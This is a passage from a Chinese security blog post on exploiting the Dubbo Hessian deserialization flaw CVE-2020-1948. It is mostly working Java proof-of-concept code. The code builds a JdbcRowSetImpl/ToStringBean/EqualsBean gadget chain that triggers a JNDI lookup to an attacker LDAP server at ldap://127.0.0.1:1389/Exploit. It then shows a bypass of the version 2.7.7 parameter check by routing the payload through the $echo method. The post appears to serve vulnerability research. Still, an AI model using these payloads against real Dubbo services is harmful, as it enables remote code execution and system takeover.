class_">DubboAutoConfigurationConsumerBootstrap</span> &#123;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">final</span> <span class="hljs-type">Logger</span> <span class="hljs-variable">logger</span> <span class="hljs-operator">=</span> LoggerFactory.getLogger(getClass());<br><br>    <span class="hljs-meta">@Reference(version = &quot;1.0.0&quot;, url = &quot;dubbo://127.0.0.1:12345&quot;)</span><br>    <span class="hljs-keyword">private</span> DemoService demoService;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setFieldValue</span><span class="hljs-params">(Object obj, String fieldName, Object value)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException &#123;<br>        <span class="hljs-type">Field</span> <span class="hljs-variable">field</span> <span class="hljs-operator">=</span> obj.getClass().getDeclaredField(fieldName);<br>        field.setAccessible(<span class="hljs-literal">true</span>);<br>        field.set(obj, value);<br>    &#125;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> Object <span class="hljs-title function_">getFieldValue</span><span class="hljs-params">(Object obj, String fieldName)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException &#123;<br>        <span class="hljs-type">Field</span> <span class="hljs-variable">field</span> <span class="hljs-operator">=</span> obj.getClass().getDeclaredField(fieldName);<br>        field.setAccessible(<span class="hljs-literal">true</span>);<br>        <span class="hljs-keyword">return</span> field.get(obj);<br>    &#125;<br><br>    <span class="hljs-keyword">private</span> Object <span class="hljs-title function_">getPoc</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-type">JdbcRowSetImpl</span> <span class="hljs-variable">jdbcRowSet</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">JdbcRowSetImpl</span>();<br>        jdbcRowSet.setDataSourceName(<span class="hljs-string">&quot;ldap://127.0.0.1:1389/Exploit&quot;</span>);<br>        <span class="hljs-type">ToStringBean</span> <span class="hljs-variable">toStringBean</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ToStringBean</span>(JdbcRowSetImpl.class, jdbcRowSet);<br>        <span class="hljs-type">EqualsBean</span> <span class="hljs-variable">equalsBean</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">EqualsBean</span>(ToStringBean.class, toStringBean);<br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">hashMap</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>&lt;&gt;(<span class="hljs-number">1</span>);<br>        hashMap.put(<span class="hljs-string">&quot;replacement&quot;</span>, <span class="hljs-string">&quot;Twings&quot;</span>);<br>        Object[] hashMapTable = (Object[])getFieldValue(hashMap, <span class="hljs-string">&quot;table&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">hashMapNode</span> <span class="hljs-operator">=</span> hashMapTable[<span class="hljs-number">1</span>];<br>        setFieldValue(hashMapNode, <span class="hljs-string">&quot;key&quot;</span>, equalsBean);<br><br>        <span class="hljs-keyword">return</span> hashMap;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>        SpringApplication.run(DubboAutoConfigurationConsumerBootstrap.class).close();<br>    &#125;<br><br>    <span class="hljs-meta">@Bean</span><br>    <span class="hljs-keyword">public</span> ApplicationRunner <span class="hljs-title function_">runner</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-type">String</span> <span class="hljs-variable">result</span> <span class="hljs-operator">=</span> demoService.sayHello(getPoc());<br>        System.out.println(result);<br>        <span class="hljs-keyword">return</span> args -&gt; logger.info(result);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>一发入魂。</p>
<h3 id="2-7-7-反序列化漏洞绕过"><a href="#2-7-7-反序列化漏洞绕过" class="headerlink" title="2.7.7 反序列化漏洞绕过"></a>2.7.7 反序列化漏洞绕过</h3><p>2.7.7 在反序列化参数的时候加多了一个验证：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">if</span> (pts == DubboCodec.EMPTY_CLASS_ARRAY) &#123;<br>    <span class="hljs-keyword">if</span> (!RpcUtils.isGenericCall(path, getMethodName()) &amp;&amp; !RpcUtils.isEcho(path, getMethodName())) &#123;<br>    	<span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">IllegalArgumentException</span>(<span class="hljs-string">&quot;Service not found:&quot;</span> + path + <span class="hljs-string">&quot;, &quot;</span> + getMethodName());<br>    &#125;<br>    pts = ReflectUtils.desc2classArray(desc);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里的 pts 是一个参数类型匹配的机制，用来检测传输的参数类型跟本地配置的是否一致，如果不一致则会检测调用方法名，如果要调用的方法不是 $invoke、$invokeAsync 或者 $echo 就会直接报错退出。</p>
<p>其实这个验证压根不影响反序列化漏洞的利用，因为反序列化在函数函数调用之前就已经进行了，所以我们可以通过控制方法名来进行反序列化攻击，修改接口中的方法名为 $echo（$invoke 会有消费者这边的问题），然后修改消费者类：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-meta">@EnableAutoConfiguration</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">DubboAutoConfigurationConsumerBootstrap</span> &#123;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">final</span> <span class="hljs-type">Logger</span> <span class="hljs-variable">logger</span> <span class="hljs-operator">=</span> LoggerFactory.getLogger(getClass());<br><br>    <span class="hljs-meta">@DubboReference(</span><br><span class="hljs-meta">            version = &quot;1.0.0&quot;,</span><br><span class="hljs-meta">            url = &quot;dubbo://127.0.0.1:12345&quot;,</span><br><span class="hljs-meta">            timeout = 100</span><br><span class="hljs-meta">    )</span><br>    <span class="hljs-keyword">private</span> DemoService demoService;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setFieldValue</span><span class="hljs-params">(Object obj, String fieldName, Object value)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException &#123;<br>        <span class="hljs-type">Field</span> <span class="hljs-variable">field</span> <span class="hljs-operator">=</span> obj.getClass().getDeclaredField(fieldName);<br>        field.setAccessible(<span class="hljs-literal">true</span>);<br>        field.set(obj, value);<br>    &#125;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> Object <span class="hljs-title function_">getFieldValue</span><span class="hljs-params">(Object obj, String fieldName)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException &#123;<br>        <span class="hljs-type">Field</span> <span class="hljs-variable">field</span> <span class="hljs-operator">=</span> obj.getClass().getDeclaredField(fieldName);<br>        field.setAccessible(<span class="hljs-literal">true</span>);<br>        <span class="hljs-keyword">return</span> field.get(obj);<br>    &#125;<br><br>    <span class="hljs-keyword">private</span> Object <span class="hljs-title function_">getPoc</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-type">JdbcRowSetImpl</span> <span class="hljs-variable">jdbcRowSet</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">JdbcRowSetImpl</span>();<br>        jdbcRowSet.setDataSourceName(<span class="hljs-string">&quot;ldap://127.0.0.1:1389/Exploit&quot;</span>);<br>        <span class="hljs-type">ToStringBean</span> <span class="hljs-variable">toStringBean</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ToStringBean</span>(JdbcRowSetImpl.class, jdbcRowSet);<br>        <span class="hljs-type">EqualsBean</span> <span class="hljs-variable">equalsBean</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">EqualsBean</span>(ToStringBean.class, toStringBean);<br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">hashMap</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>&lt;&gt;(<span class="hljs-number">1</span>);<br>        hashMap.put(<span class="hljs-string">&quot;replacement&quot;</span>, <span class="hljs-string">&quot;Twings&quot;</span>);<br>        Object[] hashMapTable = (Object[])getFieldValue(hashMap, <span class="hljs-string">&quot;table&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">hashMapNode</span> <span class="hljs-operator">=</span> hashMapTable[<span class="hljs-number">1</span>];<br>        setFieldValue(hashMapNode, <span class="hljs-string">&quot;key&quot;</span>, equalsBean);<br><br>        <span class="hljs-keyword">return</span> hashMap;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>        SpringApplication.run(DubboAutoConfigurationConsumerBootstrap.class).close();<br>    &#125;<br><br>    <span class="hljs-meta">@Bean</span><br>    <span class="hljs-keyword">public</span> ApplicationRunner <span class="hljs-title function_">runner</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-keyword">return</span> args -&gt; logger.info(demoService.$echo(getPoc()));<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>同样一发入魂。</p>
<hr>
<p>参考文章：</p>
<p><a href="https://www.jianshu.com/p/93c00a391e09">Dubbo序列化与反序列化</a></p>
<p><a href="https://paper.seebug.org/1264">CVE-2020-1948打印错误触发toString-1</a></p>
<p><a href="https://www.cnblogs.com/ph4nt0mer/p/13185549.html">CVE-2020-1948打印错误触发toString-2</a></p>
<p><a href="https://www.freebuf.com/articles/web/241401.html">CVE-2020-1948的两种触发方式</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Web/" class="print-no-link">#Web</a>
      
        <a href="/tags/Java/" class="print-no-link">#Java</a>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
        <a href="/tags/Dubbo/" class="print-no-link">#Dubbo</a>
      
        <a href="/tags/Hessian/" class="print-no-link">#Hessian</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Dubbo反序列化漏洞</div>
      <div>http://yoursite.com/2020/07/09/Dubbo反序列化漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Aluvion</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2020年7月9日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/07/15/struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E-S2-001/" title="struts2系列漏洞 S2-001">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">struts2系列漏洞 S2-001</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/07/07/Hessian%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" title="Hessian反序列化漏洞">
                        <span class="hidden-mobile">Hessian反序列化漏洞</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
